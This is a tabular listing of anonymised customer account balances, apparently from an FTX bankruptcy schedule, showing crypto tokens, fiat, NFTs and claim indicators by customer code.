| 07427511 | | BAT[2.10319408], BTC[.00968776], CUSDT[4], DOGE[1], ETH[2.74134828], ETHW[2.74019692], TRX[1], USD[0.00], USDT[1.10148017] | Yes | |
| 07427512 | | BTC[.03038296], CUSDT[3], DOGE[1], ETH[.18056879], ETHW[.18056879], NFT [434920496363223587/FTX - Off The Grid Miami #7171][1], SOL[5.00688044], USD[0.00] | | |
| 07427515 | | USD[0.01] | | |
| 07427518 | | CUSDT[2], DOGE[3], SHIB[1], TRX[4], USD[0.01] | Yes | |
| 07427520 | | CUSDT[26], DOGE[2404.6987081], TRX[656.40559237], USD[0.00] | | |
| 07427524 | | AVAX[0], BTC[0], DOGE[0], ETH[0], MATIC[0], NFT [323245949168288527/Doodle Ape Org #259][1], NFT [422718563381065960/Dino #111][1], SOL[0], UNI[0], USD[0.00] | | |
| 07427531 | | BTC[0], CUSDT[2], DOGE[6], TRX[2], USD[0.00] | | |
| 07427533 | | BTC[0], DOGE[0], ETH[0.16119245], SOL[0], USD[665.86], USDT[0.00356041] | | |
| 07427538 | | DOGE[.72], SOL[.00438], SUSHI[.498], USD[2.27], USDT[0] | | |
| 07427540 | | BAT[11.99260296], CUSDT[3], DOGE[.00058853], LINK[.06314413], TRX[92.64296291], USD[0.01] | | |
| 07427542 | | BRZ[1], CUSDT[2], DOGE[9], USD[0.00] | | |
| 07427552 | | BTC[0], ETH[0], ETHW[0.60865031], LINK[20.33725958], USD[0.00] | | |
| 07427553 | Contingent, Disputed | USD[0.00] | Yes | |
| 07427558 | | BTC[.00035766], CUSDT[207.02651277], DOGE[35.51705251], ETH[.00047084], ETHW[.00047084], LTC[.19094613], USD[0.00] | Yes | |
| 07427560 | | CUSDT[6], DOGE[6], TRX[2], USD[0.13] | | |
| 07427567 | | USD[0.00] | | |
| 07427568 | | BAT[1.01074876], BRZ[1], BTC[2.56483085], CUSDT[3], DOGE[1], ETH[.46085113], ETHW[.46071359], GRT[2.03925469], LINK[58.75316764], SHIB[14], SOL[33.04942709], SUSHI[1.06286168], TRX[0], USD[1.32], USDT[1.04661302] | Yes | |
| 07427575 | | BTC[.00000002], CUSDT[4], USD[0.00] | | |
| 07427579 | | BAT[3.29381212], BRZ[3], CUSDT[4], ETH[0.00000001], ETHW[0.00000001], GRT[1.00498957], USD[0.00], USDT[1.10829350] | Yes | |
| 07427581 | | AAVE[.48421693], BRZ[4], BTC[.0352924], CUSDT[72.49472093], DOGE[3431.13767811], ETH[.24578122], ETHW[.24558634], SHIB[18099921.77706355], SOL[2.92737254], TRX[2553.64462018], USD[0.00], USDT[223.15627476] | Yes | |
| 07427595 | | BCH[0], BTC[0], DOGE[0], ETH[0.00018292], ETHW[0.00018293], TRX[.074396], USD[0.81], USDT[0] | | |
| 07427598 | | DOGE[5848.37794975], ETH[5.65089177], ETHW[5.65089177], SOL[146.55570481], USD[0.00], USDT[0.00000906] | | |
| 07427599 | | DOGE[1], TRX[1843.94746372], USD[0.00] | | |
| 07427601 | | AVAX[.89614878], BCH[.95063264], BRZ[2], CUSDT[4710.69058252], DOGE[2435.08262085], LINK[3.25123622], LTC[2.52144089], MATIC[41.12546158], SHIB[2], SOL[9.79021332], TRX[1528.13188577], UNI[3.25492792], USD[0.00], USDT[0.00183592] | | |
| 07427602 | | BTC[.00006557], SOL[0], USD[0.00], USDT[3.96605] | | |
| 07427612 | | BTC[0], DOGE[1.04214252], TRX[0], USD[0.00] | | |
| 07427613 | | USD[0.01] | | |
| 07427615 | | USD[54504.51] | | |
| 07427618 | | CUSDT[4], DOGE[1], SOL[0], TRX[1], USD[0.00] | | |
| 07427620 | | USD[0.04] | | |
| 07427622 | | BTC[0], SOL[0], USD[0.92] | | |
| 07427630 | | BRZ[1], CUSDT[4], DOGE[.00040471], TRX[1], USD[0.00] | Yes | |
| 07427633 | | BAT[3], CUSDT[2], DOGE[.56088063], GRT[1], TRX[159.0456205], USD[0.01], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07427634 | | CUSDT[1], ETH[.00127032], ETHW[5.22309637], NFT (408931795354888094/Entrance Voucher #3692)[1], USD[0.00] | Yes | |
| 07427635 | | CUSDT[4], SHIB[1], USD[0.01] | | |
| 07427637 | | DOGE[5077.917], SUSHI[.1136], USD[0.00] | | |
| 07427639 | | BRZ[1], BTC[0], CUSDT[1], TRX[2], USD[0.00] | | |
| 07427653 | | CUSDT[2], USD[0.00] | Yes | |
| 07427660 | | NFT (544557974104588862/Coachella x FTX Weekend 1 #10081)[1] | | |
| 07427663 | | AUD[0.00], BAT[0], BTC[0], GBP[0.00], GRT[0], SOL[0], TRX[0], USD[0.00], USDT[0.00043710] | | |
| 07427665 | | ETH[0], ETHW[7.00261449], USD[0.00] | | |
| 07427666 | | LINK[26.14824728], SOL[0.00381119], SUSHI[40.6366766], USD[0.00] | | |
| 07427669 | | BTC[0], DOGE[0], ETH[0], SHIB[0], SOL[0], USD[0.87] | Yes | |
| 07427672 | | BTC[.03586194], CUSDT[2], LTC[.00004855], SHIB[679.47237569], TRX[1], USD[514.63], USDT[2.89981673] | Yes | |
| 07427673 | | BTC[.00084809], CUSDT[1], DOGE[101.46470096], TRX[3866.91167187], USD[25.69] | | |
| 07427674 | | TRX[3], USD[0.01] | | |
| 07427676 | | SOL[1954.8492], USD[20026.35] | | |
| 07427678 | | BTC[2.3781177], USD[3.89] | | |
| 07427682 | | ETH[0], USD[0.00] | | |
| 07427683 | | BTC[.02785536], DOGE[1], USD[0.00] | Yes | |
| 07427685 | | DOGE[0], ETH[0] | | |
| 07427686 | | TRX[1], USD[235.11] | | |
| 07427687 | | USD[0.72] | Yes | |
| 07427689 | | USD[0.00] | | |
| 07427690 | | BRZ[1], BTC[.09113399], TRX[1], USD[223.82] | | |
| 07427692 | | BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07427701 | | SHIB[1870.34686672], USD[0.00], USDT[0] | Yes | |
| 07427704 | | BRZ[1], CUSDT[30], DOGE[206.73853932], TRX[2], USD[0.00] | Yes | |
| 07427706 | | BTC[.00007913], DOGE[4.995], ETH[.00000001], ETHW[0.23597368], USD[0.31] | | |
| 07427709 | | DOGE[1354.77882313], LINK[9.45338524], TRX[377.08674197], USD[0.00] | | |
| 07427712 | | CUSDT[14], DOGE[0], SHIB[197301.15079075], TRX[2], USD[0.00] | | |
| 07427714 | | USD[100.00] | | |
| 07427719 | | BRZ[ 98050326], CUSDT[32], DAI[.06981124], DOGE[.44767804], KSHIB[.00000035], SHIB[570446256.52298141], TRX[5.49560841], USD[-3384.02], USDT[.00512542] | Yes | |
| 07427725 | | CAD[0.03], USD[0.01] | Yes | |
| 07427726 | | BTC[0], DOGE[1001.57341098], ETH[0.00169084], ETHW[0], EUR[0.00], MATIC[100], SOL[11.17423357], SUSHI[100], USD[1614.04], USDT[0] | | |
| 07427728 | Contingent, Disputed | BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07427733 | | BAT[5.26721496], BCH[.0138033], CUSDT[3], TRX[451.57456607], USD[0.00] | | |
| 07427735 | | USD[894.90], USDT[5.4791] | | |
| 07427742 | | DOGE[2], USD[0.00] | | |
| 07427743 | | USD[0.00] | | |
| 07427752 | | CUSDT[7], DOGE[4250.75299522], MATIC[179.80397829], SUSHI[28.65342559], TRX[3], USD[0.00] | Yes | |
| 07427758 | | CUSDT[1], DOGE[.77969616], USD[0.93] | | |
| 07427759 | | USDT[.9067] | | |
| 07427760 | | CUSDT[8], DOGE[3], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07427761 | | BRZ[4.47300764], BTC[.00257087], CUSDT[4.62512872], DOGE[2381.63807549], ETH[.11126767], ETHW[.11126767], SHIB[2326982.7544403], TRX[21.57573708], USD[4.80] | | |
| 07427767 | | BCH[0], CUSDT[2], DOGE[0], ETH[0.02397777], ETHW[0.02367681], USD[0.00], USDT[0] | Yes | |
| 07427772 | | SOL[0] | | |
| 07427779 | | CUSDT[1], DOGE[1.37042716], TRX[1.33523448], USD[0.01] | | |
| 07427781 | | BRZ[1], USD[0.00] | | |
| 07427784 | | BRZ[1], CUSDT[3], ETHW[.01221117], USD[13.75] | | |
| 07427789 | | BAT[1.01563679], CUSDT[3], DOGE[3], GRT[2.00154394], SHIB[2], USD[0.01] | Yes | |
| 07427792 | | BTC[0.00003970], LTC[.00709444], TRX[.000005], USD[0.99], USDT[.0666074] | | |
| 07427793 | | BTC[0], TRX[.000016], USD[0.00], USDT[0.00000001], WBTC[0] | | |
| 07427795 | | BRZ[44.70291545], DOGE[62.57269781], TRX[133.31124561], USD[7.00] | | |
| 07427796 | | DAI[20] | | |
| 07427799 | | NFT (391060117050650870/Coachella x FTX Weekend 2 #7927)[1] | | |
| 07427802 | | TRX[0], USD[0.00] | | |
| 07427828 | | BAT[4.33393749], BRZ[.03717014], CUSDT[3], DOGE[12.408747146], ETH[.00050907], ETHW[.00050907], GRT[2.03374939], SOL[.00023335], SUSHI[518.44288167], TRX[7], UNI[1.08349413], USD[0.00], USDT[5.41747128] | Yes | |
| 07427835 | | BRZ[1], DOGE[.00057537], SHIB[10], UNI[.00092282], USD[0.01] | Yes | |
| 07427836 | | USD[84.28], USDT[0.00000001] | | |
| 07427839 | | NFT (360850169257441995/FTX - Off The Grid Miami #7509)[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07427844 | | CUSDT[7], DOGE[542.06952565], USD[0.00] | | |
| 07427845 | | USD[0.04], USDT[0] | | |
| 07427846 | | NFT (515306123748816903/Entrance Voucher #6044)[1], USDT[0] | | |
| 07427847 | | CUSDT[5], GRT[1.00000913], TRX[1], USD[0.00] | | |
| 07427859 | | BTC[0] | | |
| 07427865 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07427867 | | CUSDT[3], DOGE[2], USD[0.00] | Yes | |
| 07427869 | | CUSDT[1], TRX[115.91441262], USD[0.00] | | |
| 07427879 | | DOGE[1], USD[0.00] | | |
| 07427882 | | BTC[0.00112204], ETH[.00000001], ETHW[0], LTC[0], MATIC[0.00132637], USD[0.51] | | |
| 07427886 | | DOGE[1], TRX[25.48359787], USD[1.82] | | |
| 07427888 | | CUSDT[2], USD[0.00], USDT[0] | Yes | |
| 07427891 | | TRX[1], USD[0.00] | | |
| 07427892 | | USD[0.01] | Yes | |
| 07427893 | | DOGE[1], USD[0.00], USDT[99.48050286] | | |
| 07427895 | | BAT[1], BRZ[1], BTC[0], CUSDT[5], DOGE[8], ETH[0], PAXG[0], SHIB[3], SOL[0], TRX[1.00000100], USD[0.00], USDT[0.00001087] | | |
| 07427901 | | BAT[1.0165555], BRZ[2], CUSDT[6], DOGE[8.42175129], ETH[.00000329], ETHW[.00000329], GRT[2.06184094], SOL[.0003569], TRX[4], USD[0.00], USDT[542.25687009] | Yes | |
| 07427902 | | USD[0.76] | | |
| 07427903 | | SOL[82.63859855], USDT[0.00000025] | | |
| 07427906 | | BAT[4.40604222], BF_POINT[600], BRZ[2], BTC[.00637666], CUSDT[38], DOGE[398.52528548], ETH[.04025471], ETHW[.03975411], SHIB[11], TRX[2595.13411655], USD[203.02], USDT[37.64342363] | Yes | |
| 07427911 | | BRZ[1], BTC[.0000044], LTC[.00060186], USD[0.81], USDT[0.00704006] | | |
| 07427915 | | BTC[.00011382], ETH[0.00160066], ETHW[0.00260018], USD[1.94] | | |
| 07427926 | | CUSDT[493.16425019], DOGE[25.05683912], KSHIB[457.25719266], SHIB[999251.49099851], TRX[253.09306446], USD[0.00] | Yes | |
| 07427933 | | BAT[0], BRZ[4], BTC[0], CUSDT[43], DOGE[7.06460687], ETH[0], ETHW[0], GRT[1], KSHIB[0], LTC[0], SHIB[2818931.99955596], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07427937 | | AVAX[.00000931], BTC[0], NFT (309762474296687048/Founding Frens Investor #225)[1], NFT (439447577901938780/Founding Frens Lawyer #163)[1], NFT (474092765359038388/Astral Apes #2053)[1], SHIB[25], SOL[0.00004708], TRX[0], USD[301.69] | Yes | |
| 07427941 | | USD[0.01] | Yes | |
| 07427942 | | BTC[.0000949], ETH[.00844], ETHW[.00844], LINK[1070.75225506], MATIC[5.168], SOL[.0032], SUSHI[.0593], UNI[.09944], USD[7.61] | | |
| 07427943 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07427944 | | BTC[.00026176], DOGE[1], USDT[0] | | |
| 07427945 | | BTC[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07427950 | | CUSDT[1], DOGE[1441.99005457], ETH[.01752665], ETHW[.01752665], SOL[.08309746], TRX[1], USD[0.00] | | |
| 07427952 | | BTC[0], ETH[0], ETHW[0] | | |
| 07427954 | | NFT (455338250013730134/Good Boy #53)[1], NFT (542983341612788850/Humpty Dumpty #792)[1], USD[0.00], USDT[0] | Yes | |
| 07427963 | | SOL[.096], USD[2.01] | | |
| 07427967 | | BRZ[2], CUSDT[2], USD[0.00] | | |
| 07427970 | | BTC[0], SOL[5.54], USD[1.27] | | |
| 07427974 | | DOGE[0.67915220], LINK[0], SOL[0], USD[0.00] | | |
| 07427976 | | BAT[1.01625751], DOGE[2], USDT[0.00039663] | Yes | |
| 07427977 | | BTC[.00000001], DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[0.02569154], USD[0.02], USDT[0] | Yes | |
| 07427982 | | BTC[0.00002622], USD[2.98], YFI[.001] | | |
| 07427983 | | USD[0.00] | | |
| 07427984 | | BTC[.05428607], USD[2.26] | | |
| 07427990 | | USD[550.31] | Yes | |
| 07427993 | | LTC[.00025446], USD[0.00] | | |
| 07427995 | | ETH[.00016865], ETHW[.00016865], USD[0.00] | Yes | |
| 07428001 | | BTC[.00172972] | | |
| 07428004 | | AAVE[.00889], USD[0.33] | | |
| 07428009 | | BRZ[1], CUSDT[1], DOGE[1], TRX[102.07166943], USD[82.30] | | |
| 07428012 | | AVAX[0], ETH[0], USD[0.01] | | |
| 07428017 | Contingent, Disputed | BRZ[1], BTC[0], CUSDT[2], DOGE[1], ETH[.00117598], ETHW[.00117598], TRX[2], USD[0.00] | | |
| 07428029 | | TRX[0], USD[0.00] | | |
| 07428034 | | SHIB[3], TRX[.000146], USD[0.01], USDT[0] | | |
| 07428036 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], KSHIB[0], NFT (547213480734689996/Stand )[1], NFT (559958939645885110/Misty Snow)[1], SHIB[0], USD[0.01], USDT[0] | Yes | |
| 07428047 | | BCH[0], BRZ[3], BTC[0], CUSDT[75.46341402], DOGE[9.43896826], ETH[0], LTC[0], SHIB[4], TRX[0], USD[0.02], USDT[0] | Yes | |
| 07428048 | | BCH[.00058], BTC[0], DOGE[279.73], ETH[.00094], ETHW[.00094], SOL[.00375], USD[1.83] | | |
| 07428050 | | NFT (328182329098355584/The Hill by FTX #8750)[1] | | |
| 07428053 | | USD[0.02], USDT[0.94339803] | Yes | |
| 07428054 | | TRX[.000001], USDT[0.00035651] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07428060 | | BRZ[2], CUSDT[5], DOGE[26.64968761], TRX[.05405332], USD[0.00] | | |
| 07428071 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07428079 | | DOGE[2], USD[0.01] | | |
| 07428080 | | USD[493.28] | | |
| 07428081 | | BTC[.00316128], CUSDT[1], TRX[1], USD[0.91], USDT[0] | | |
| 07428083 | | BCH[.73094872], BRZ[1], BTC[.14203636], CUSDT[1], DOGE[3799.47071363], ETH[.71466907], ETHW[.71436888], LINK[5.35026194], LTC[2.33711741], MATIC[360.19727778], SHIB[1], SOL[4.41531659], TRX[2], USD[0.00], USDT[0.00000716] | Yes | |
| 07428094 | | DOGE[1], SHIB[2], USD[1.32], USDT[0] | | |
| 07428095 | | DOGE[2], USD[0.00] | | |
| 07428096 | | USD[20.00] | | |
| 07428099 | | BAT[1], DOGE[0], ETH[.00000001], ETHW[16.36820564], SHIB[.00000002], TRX[1], USD[0.73], USDT[2.07241926] | | |
| 07428107 | | USD[0.00] | Yes | |
| 07428110 | | NFT [50116183094092009]/Bahrain Ticket Stub #15231[1], SHIB[1], SOL[0], TRX[1], USD[0.49], USDT[0] | | |
| 07428113 | | BRZ[1], CUSDT[6], DOGE[.57347025], SHIB[249514.8373995], USD[0.00] | | |
| 07428115 | | BTC[0], PAXG[0], SOL[0], USD[0.00] | | |
| 07428116 | | USD[47.73] | | |
| 07428121 | | DOGE[0], SHIB[9], USD[19.14], USDT[0.00000001] | | |
| 07428161 | | BRZ[3], BTC[.00520083], CUSDT[2], DOGE[39.57072763], TRX[3], USD[0.00] | Yes | |
| 07428163 | | MATIC[558.36220338], TRX[3], USD[0.00] | | |
| 07428165 | | TRX[97.72100925], USD[0.00] | | |
| 07428166 | | DOGE[2], TRX[391.40808812], USD[0.00], USDT[76.40748624] | | |
| 07428167 | | SOL[.254] | | |
| 07428169 | | BTC[.00129337] | Yes | |
| 07428170 | | TRX[.000004] | Yes | |
| 07428171 | | BAT[1], BF_POINT[100], BRZ[2], CUSDT[9], DOGE[7.00057537], GRT[1], NFT (31297592505393997)/Australia Ticket Stub #1901[1], SHIB[5], TRX[113.32034779], USD[0.00], USDT[0] | Yes | |
| 07428177 | | USD[3.37], USDT[0] | | |
| 07428185 | | BRZ[1], CUSDT[8], DOGE[860.5700645], ETH[.02695837], ETHW[.02695837], PAXG[.06488143], SHIB[1], TRX[1], USD[0.00], USDT[9.94407343] | | |
| 07428186 | | USDT[0] | | |
| 07428194 | | BTC[0], ETH[0], ETHW[9.99875700], NFT (333463513435047200)/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #84[1], NFT (336927631833709800)/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #64[1], NFT (446191787879457903)/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #62[1], NFT (473152139095807046)/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #77[1], SOL[10], USD[593.39], USDT[0] | | |
| 07428197 | | DOGE[33.77443419], ETH[.00294177], ETHW[.00294177], USD[0.00] | | |
| 07428199 | | TRX[7.371466] | | |
| 07428207 | | USD[0.00] | | |
| 07428209 | | NFT (530124002917879569)/Entrance Voucher #2975[1], SHIB[201.07383966], USD[992.71] | Yes | |
| 07428210 | | BRZ[1], BTC[.00000024], DOGE[5], ETH[.00000025], ETHW[.02698176], SHIB[8], TRX[3], USD[449.62] | Yes | |
| 07428212 | | BF_POINT[500], BRZ[1], BTC[0], CUSDT[3], SHIB[2], TRX[1], USD[0.00], USDT[0.00014335] | | |
| 07428213 | | BRZ[1], TRX[0] | | |
| 07428214 | | CUSDT[8], DOGE[3], USD[0.09], USDT[0.00000001] | | |
| 07428218 | | CUSDT[3], DOGE[1], USD[50.00] | | |
| 07428226 | | BTC[.00070159], DOGE[3696.3978335], ETH[.14602962], ETHW[.14513985], SHIB[5786.74564543], USD[0.00] | Yes | |
| 07428232 | | SOL[0] | | |
| 07428233 | | BAT[.05089804], BTC[0], DOGE[5.42087093], ETH[.00000001], SOL[0], SUSHI[0], USD[0.00] | | |
| 07428237 | | BAT[0], DOGE[0], EUR[0.00], GRT[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07428238 | | BAT[31.66773756], CUSDT[4], DOGE[4694.96712856], TRX[694.24313519], USD[0.00] | Yes | |
| 07428241 | | BTC[0], DOGE[1], SHIB[6], TRX[155.20401467], USD[0.00], USDT[0.00001228] | Yes | |
| 07428242 | | CUSDT[1], DOGE[1], TRX[0], USDT[0] | | |
| 07428244 | | SUSHI[.409], USDT[0] | | |
| 07428245 | | BRZ[2], CUSDT[5], DOGE[5733.92646231], TRX[13808.46881604], USD[0.00], USDT[1] | | |
| 07428251 | | USD[0.00] | | |
| 07428252 | | BTC[.00048729], DOGE[1], USD[0.00] | | |
| 07428255 | | CUSDT[3], SHIB[1227744.39410067], TRX[1], USD[4.51] | | |
| 07428258 | | BAT[1], BTC[0], CUSDT[6], DOGE[2], TRX[0], USD[0.00], USDT[0] | | |
| 07428265 | | CUSDT[1], DOGE[1], TRX[195.59701092], USD[0.00] | | |
| 07428266 | | AAVE[0], BAT[0], BRZ[0], CUSDT[8], DAI[0], DOGE[1], ETH[0], GRT[0], KSHIB[0], LINK[.04608998], PAXG[0], SHIB[0], SUSHI[0], UNI[0], USD[0.06], USDT[0.00000001] | | |
| 07428267 | | BTC[.0000525], SOL[.00403], USD[0.00], USDT[0] | | |
| 07428268 | | CUSDT[1], SHIB[6.86385124], USD[0.00] | Yes | |
| 07428271 | | CUSDT[1], DOGE[1], SOL[0.58323585], USD[0.00] | | |
| 07428277 | | BRZ[2], CUSDT[2], DOGE[4], TRX[3], USD[0.00], USDT[0] | | |
| 07428285 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], GRT[1], USD[0.01], USDT[0.00000001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07428293 | | TRX[.000002], USDT[100] | | |
| 07428295 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07428310 | | BRZ[1], CUSDT[2352.54622088], DOGE[0], ETH[.00000003], ETHW[.00000003], TRX[1], USD[0.00] | | |
| 07428314 | | CUSDT[1], USD[0.00] | | |
| 07428316 | | BTC[0], DAI[0], SOL[0], USDT[0.00000003] | | |
| 07428321 | | BTC[0], NFT (518784786825143932/Megalodon Rogue Shark Tooth)[1], USD[0.00], USDT[0] | | |
| 07428331 | | DOGE[0], USD[4.02] | | |
| 07428332 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07428335 | | CUSDT[470.89338955], DOGE[533.07559693], TRX[137.66964902], USD[0.50] | | |
| 07428345 | | DOGE[7999.88185774], GRT[1], TRX[1], USD[0.00] | | |
| 07428346 | | USD[0.00] | | |
| 07428348 | | BRZ[1], BTC[0], CUSDT[5], DOGE[2], ETH[0.00755947], ETHW[0.00746370], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07428349 | | NFT (357950778071102523/FTX - Off The Grid Miami #735)[1] | | |
| 07428352 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07428353 | | CUSDT[33], DOGE[.00583322], TRX[6], USD[0.00] | Yes | |
| 07428354 | | BRZ[2], CUSDT[5], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07428358 | | BAT[4], BRZ[3], BTC[0.00100000], CUSDT[10], DOGE[100.72000000], ETH[0.04678418], ETHW[0.04678418], GRT[1], SOL[1.16014663], TRX[0.70793900], USD[0.00], USDT[0] | | |
| 07428360 | | BTC[.00168522], DOGE[1], USD[0.00] | | |
| 07428366 | | BTC[.00053603], CUSDT[1], DOGE[385.93150498], USD[0.00] | | |
| 07428367 | | USD[0.01] | | |
| 07428370 | | BRZ[1], CUSDT[3], DOGE[2], GRT[1], SOL[.00066419], TRX[2], USD[0.01], USDT[1] | | |
| 07428371 | | BAT[1.01510944], CUSDT[4], DOGE[16362.66014323], ETH[1.11360004], ETHW[1.11313222], MATIC[327.66967008], SHIB[2194259.67771564], SOL[24.93177526], TRX[4], USD[1856.85] | Yes | |
| 07428379 | | NFT (315821758396504672/Entrance Voucher #2081)[1] | | |
| 07428384 | | CUSDT[4], DOGE[1236.56669150], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07428391 | | CUSDT[1307.33716945], DOGE[136.9087058], SHIB[1], TRX[1829.54709478], USD[0.00] | Yes | |
| 07428392 | | USD[100.00] | | |
| 07428393 | | DOGE[.42255662], TRX[.50439074], USD[0.13] | | |
| 07428394 | | AUD[32.41], CAD[12.00], CUSDT[1.00003781], DOGE[.00003047], EUR[46.01], GRT[.00004066], LTC[1.01007541], SOL[2.12376303], SUSHI[4.32777856], TRX[2187.58147619], USD[29.08] | | |
| 07428397 | | BRZ[1], CUSDT[4], PAXG[0.09988745], SUSHI[1], TRX[3], USD[0.00] | | |
| 07428400 | | CUSDT[10], DOGE[2], ETH[.18268998], ETHW[.18268998], SOL[.40217462], TRX[1], USD[0.00], USDT[0] | | |
| 07428406 | | BTC[.00003017], NFT (369211968851248360/Saudi Arabia Ticket Stub #823)[1], NFT (517975178773277094/Amperage)[1] | | |
| 07428407 | | BTC[.0000062], USD[0.00], USDT[0] | Yes | |
| 07428410 | | BAT[0], BRZ[1], BTC[0], CAD[0.00], CUSDT[1], ETH[0], LTC[0], SGD[0.00], TRX[1] | Yes | |
| 07428426 | | BTC[.00007], USDT[0] | | |
| 07428431 | | CUSDT[7], DOGE[1], GRT[44.80394729], USD[5.74] | Yes | |
| 07428435 | | ETH[.250596], ETHW[.250596], SUSHI[27.11215874] | | |
| 07428437 | | DOGE[4], USD[0.01] | | |
| 07428438 | | ETHW[.06827774], MATIC[123.10107226], SOL[0], USD[0.00] | | |
| 07428442 | | BRZ[1], BTC[.04643515], CUSDT[9], DOGE[2], ETH[0], ETHW[0], TRX[1], USD[0.00] | Yes | |
| 07428443 | | BRZ[2], BTC[.00258532], CUSDT[19], DOGE[2], ETH[.02337321], ETHW[.02308572], GRT[101.47398947], LINK[23.9481887], MATIC[68.61947069], MKR[.0354435], NFT (290433704511556542/Metaverse Masks #16)[1], NFT (342514063866201706/Metaverse Masks #10)[1], NFT (359903652491096484/Metaverse Masks #26)[1], NFT (490439224802307438/Metaverse Masks #17)[1], NFT (554681769314738717/Metaverse Masks #13)[1], SOL[5.53370373], TRX[3], USD[0.00] | Yes | |
| 07428449 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07428458 | | BAT[341.45186724], BRZ[1], CUSDT[9370.40547056], DOGE[362.50428779], TRX[3972.65069288], USD[0.00] | | |
| 07428459 | | AAVE[.00012], BTC[0.00016572], DOGE[0.98250000], ETH[0.00208462], ETHW[0.08011486], GRT[0.51900000], LTC[.05676], SOL[0.02064718], SUSHI[.3025], UNI[.00615], USD[17.32], USDT[0.39603933] | | |
| 07428461 | | BTC[.00000012], CUSDT[6], DOGE[3.00318743], ETHW[.42793845], SHIB[7], TRX[3], USD[507.45] | Yes | |
| 07428462 | | ALGO[72.67204069], BF_POINT[100], BRZ[4], BTC[.00176209], CUSDT[1309.3649619], DOGE[29425.01925496], ETH[.16094431], ETHW[.16044304], GRT[91.55320554], LINK[2.46402624], MATIC[16.57566203], SHIB[5735792.46569446], SOL[4.81378619], TRX[1018.10799231], USD[0.00] | Yes | |
| 07428466 | | BAT[20.83925046], BRZ[61.09229958], CUSDT[991.67789352], DOGE[367.55619749], GRT[16.34609454], LTC[.0528641], SOL[1.76425072], TRX[339.8325288], USD[0.00] | | |
| 07428473 | | ETH[0], USD[0.00], USDT[9.94307974] | | |
| 07428476 | | BAT[2.02831892], BRZ[5.06679376], CUSDT[2], DOGE[1], SOL[0], SUSHI[1.08748841], TRX[9], USD[0.01], USDT[3.22760028] | Yes | |
| 07428480 | | USD[1.00] | | |
| 07428482 | | DOGE[0], SOL[0], USD[0.06] | | |
| 07428483 | | BAT[1], CUSDT[2], DOGE[909.56525075], TRX[2], USD[1910.26], USDT[1] | | |
| 07428487 | | BCH[0], BTC[0], DOGE[0], ETH[0.00798164], ETHW[0.00788588], SHIB[18362.62057601], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07428493 | | BAT[1], BRZ[1], BTC[.04562176], CUSDT[4], DOGE[8], ETH[.00000918], ETHW[.00000918], LINK[1], SOL[1.80692045], TRX[4], USD[0.95], USDT[2] | | |
| 07428496 | | CUSDT[1], UNI[4.42424316], USD[50.00] | | |
| 07428497 | | BCH[.01880593], BTC[.00020448], CUSDT[3], DOGE[479.95865977], SUSHI[1.20823863], TRX[1], USD[0.00] | Yes | |
| 07428505 | | DOGE[50275.63882569], ETH[4.50713598], ETHW[4.50713598], GRT[1], TRX[33631.77984264], UNI[1], USD[0.00] | | |
| 07428509 | | BTC[.0018] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07428520 | | BRZ[1], CUSDT[1], DOGE[1], TRX[4044.36519356], USD[0.00] | | |
| 07428524 | | USD[0.01] | | |
| 07428525 | | ALGO[266.24331461], BTC[.00537207], DOGE[243.83520032], ETH[.0124256], ETHW[.01227501], MATIC[531.34266208], SHIB[7594754.89846987], SOL[7.54867962], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07428534 | | USD[0.04], USDT[0] | Yes | |
| 07428540 | | BCH[0], BTC[0], CAD[0.00], CUSDT[0], DOGE[0], ETH[0], GRT[0], LTC[0], SGD[0.00], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07428543 | | TRX[.000002], USDT[100] | | |
| 07428550 | | ETH[.00000001], ETHW[0], NFT (341698076499135560/Mu)[1], NFT (372378076325162002/The Rainbow Connection)[1], NFT (466110231202745873/Nord Grids #1)[1], NFT (510339798092008944/Grol Lock)[1], NFT (518166880525634570/Gruvbox Grids #1)[1], SOL[0], USD[0.35], USDT[0] | | |
| 07428552 | | USD[300.00] | | |
